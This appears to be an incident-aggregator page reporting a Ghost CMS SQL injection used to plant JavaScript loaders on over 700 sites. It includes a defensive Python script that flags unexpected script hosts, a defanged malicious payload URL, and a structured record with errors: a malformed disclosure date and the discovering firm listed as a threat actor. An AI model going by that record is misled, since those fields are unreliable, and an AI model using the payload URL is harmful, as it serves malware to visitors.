DuckDuckGo, Harvard University and Ghost: Critical Ghost CMS Vulnerability Exploited to Hack 700+ Websites

Critical Ghost CMS Vulnerability Exploited in Large-Scale Malware Campaign

A severe SQL injection flaw in the Ghost content management system (CMS), tracked as CVE-2026-26980, has been exploited in a widespread cyberattack compromising over 700 websites, including platforms linked to Harvard University, the University of Oxford, and DuckDuckGo. The campaign, uncovered by Chinese cybersecurity firm QiAnXin’s XLab team, leverages unpatched Ghost installations to inject malicious JavaScript, enabling ClickFix malware attacks.

The vulnerability, disclosed and patched in February 2026 (Ghost version 6.19.1), carries a CVSS score of 9.4, reflecting its critical severity. It allows unauthenticated attackers to extract sensitive data, including Admin API keys, user credentials, and authentication tokens, via Ghost’s Content API. Once obtained, the Admin API key lets attackers modify published articles and embed malicious code without authorization.

Exploitation began almost immediately after the patch’s release, with a DLL file linked to the campaign compiled on February 16, 2026, the same day the fix was announced. The first malicious activity was detected on May 7, 2026, with hundreds of Ghost-powered sites compromised by early May. Victims span AI, blockchain, cybersecurity, fintech, media, SaaS, and higher education, though nearly half were personal blogs or independent sites.

Attackers injected two-stage JavaScript loaders into website articles, directing visitors to an external domain (clo4shara[.]xyz/11z77u3.php) to fetch additional payloads. The infrastructure used Adspect, a commercial cloaking service, to fingerprint visitors and selectively deliver malware, evading detection by automated scanners. QiAnXin noted that at least two threat groups are actively competing in these "poisoning operations," with some sites receiving multiple malicious code injections in a single day.
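A defender-side check for the article injection described above, as an added example that is not from the original article or from Ghost: it parses each post's HTML and flags script hosts outside an allowlist. The allowlist, the sample posts and the names `ScriptAudit`, `audit_post` and `flagged` are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (constructed values).
ALLOWED_HOSTS = {"blog.example.com", "cdn.example.org"}
URL_RE = re.compile(r"""(?:https?:)?//[^\s"'<>)\\]+""", re.I)

class ScriptAudit(HTMLParser):
    """Collect script src values and URLs found inside inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.body = None          # list of text chunks while inside <script>
        self.inline_scripts = 0
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.body = []
            src = dict(attrs).get("src")
            if src:
                self.urls.append(src)
    def handle_data(self, data):
        if self.body is not None:
            self.body.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self.body is not None:
            code = "".join(self.body)
            if code.strip():
                self.inline_scripts += 1
                self.urls.extend(URL_RE.findall(code))
            self.body = None

def audit_post(html, allowed=ALLOWED_HOSTS):
    """Return off-allowlist script hosts and the number of inline scripts."""
    p = ScriptAudit()
    p.feed(html)
    hosts = {urlparse(u).hostname for u in p.urls} - {None}
    return {"unexpected_hosts": sorted(hosts - set(allowed)), "inline_scripts": p.inline_scripts}

# Constructed sample posts keyed by slug; not taken from any real site.
POSTS = {
    "clean": '<p>Hello</p><script src="https://cdn.example.org/embed.js"></script>',
    "tampered": '<p>Hi</p><script>var s=document.createElement("script");'
                's.src="//loader.example.net/a.php";document.head.appendChild(s);</script>',
}

def flagged(posts=POSTS):  # slugs whose HTML references a non-allowlisted script host
    return [slug for slug, html in posts.items() if audit_post(html)["unexpected_hosts"]]
```

A loader that assembles its URL from string fragments will not match the URL pattern, which is why the inline script count is reported separately: any inline script in a post body that the author did not add deserves review.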

Despite notifications, most compromised sites failed to respond, leaving the campaign ongoing. The attack highlights the risks of delayed patching in widely used CMS platforms.

Source: https://thecyberexpress.com/cve-2026-26980-ghost-cms-vulnerability/

DuckDuckGo cybersecurity rating report: https://www.rankiteo.com/company/duck-duck-go

Harvard University cybersecurity rating report: https://www.rankiteo.com/company/harvard-university

Ghost cybersecurity rating report: https://www.rankiteo.com/company/ghost-foundation

"id": "DUCHARGHO1779798590",
"linkid": "duck-duck-go, harvard-university, ghost-foundation",
"type": "Cyber Attack",
"date": "5/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'industry': 'Higher Education',
                        'name': 'Harvard University',
                        'size': 'Large',
                        'type': 'Educational Institution'},
                       {'industry': 'Higher Education',
                        'name': 'University of Oxford',
                        'size': 'Large',
                        'type': 'Educational Institution'},
                       {'industry': 'Search Engine/Privacy',
                        'name': 'DuckDuckGo',
                        'size': 'Large',
                        'type': 'Technology Company'},
                       {'industry': 'Various',
                        'size': 'Small',
                        'type': 'Personal Blogs/Independent Sites'},
                       {'industry': ['AI',
                                     'Blockchain',
                                     'Cybersecurity',
                                     'Fintech',
                                     'Media',
                                     'SaaS'],
                        'type': 'Websites'}],
 'attack_vector': 'Unpatched Ghost CMS installations, malicious JavaScript '
                  'injection',
 'data_breach': {'data_exfiltration': 'Yes',
                 'personally_identifiable_information': 'Potential (user '
                                                        'credentials, '
                                                        'authentication '
                                                        'tokens)',
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': ['Admin API keys',
                                              'User credentials',
                                              'Authentication tokens']},
 'date_detected': '2026-05-07',
 'date_publicly_disclosed': '2026-02-2026',
 'description': 'A severe SQL injection flaw in the Ghost content management '
                'system (CMS), tracked as CVE-2026-26980, has been exploited '
                'in a widespread cyberattack compromising over 700 websites, '
                'including platforms linked to Harvard University, the '
                'University of Oxford, and DuckDuckGo. The campaign leverages '
                'unpatched Ghost installations to inject malicious JavaScript, '
                'enabling ClickFix malware attacks.',
 'impact': {'brand_reputation_impact': 'High (affected prestigious '
                                       'institutions and brands)',
            'data_compromised': 'Admin API keys, user credentials, '
                                'authentication tokens',
            'identity_theft_risk': 'High (PII exposure risk)',
            'operational_impact': 'Malicious code injection into published '
                                  'articles, unauthorized modifications',
            'systems_affected': 'Over 700 Ghost-powered websites'},
 'initial_access_broker': {'backdoors_established': 'Malicious JavaScript '
                                                    'injection',
                           'entry_point': 'Unpatched Ghost CMS '
                                          '(CVE-2026-26980)',
                           'high_value_targets': ['Harvard University',
                                                  'University of Oxford',
                                                  'DuckDuckGo']},
 'investigation_status': 'Ongoing',
 'lessons_learned': 'Risks of delayed patching in widely used CMS platforms, '
                    'importance of timely vulnerability remediation, and the '
                    'need for enhanced monitoring of third-party integrations.',
 'motivation': 'Data exfiltration, malware distribution, financial gain '
               '(potential)',
 'post_incident_analysis': {'corrective_actions': 'Patch management, enhanced '
                                                  'monitoring, security '
                                                  'audits, user education',
                            'root_causes': 'Unpatched Ghost CMS vulnerability '
                                           '(CVE-2026-26980), delayed patching '
                                           'by website administrators, lack of '
                                           'monitoring for unauthorized '
                                           'content modifications'},
 'recommendations': ['Immediately patch Ghost CMS to version 6.19.1 or later',
                     'Monitor for unauthorized modifications to published '
                     'content',
                     'Implement behavioral WAF and enhanced monitoring for '
                     'malicious JavaScript injections',
                     'Conduct regular security audits of CMS platforms and '
                     'third-party integrations',
                     'Educate users on the risks of unpatched software'],
 'references': [{'source': 'QiAnXin’s XLab team'}],
 'response': {'remediation_measures': 'Patch Ghost CMS to version 6.19.1 or '
                                      'later',
              'third_party_assistance': 'QiAnXin’s XLab team (discovery and '
                                        'analysis)'},
 'threat_actor': ['QiAnXin’s XLab team (discoverers)',
                  'At least two competing threat groups'],
 'title': 'Critical Ghost CMS Vulnerability Exploited in Large-Scale Malware '
          'Campaign',
 'type': 'SQL Injection, Malware Campaign',
 'vulnerability_exploited': 'CVE-2026-26980 (SQL Injection in Ghost CMS)'}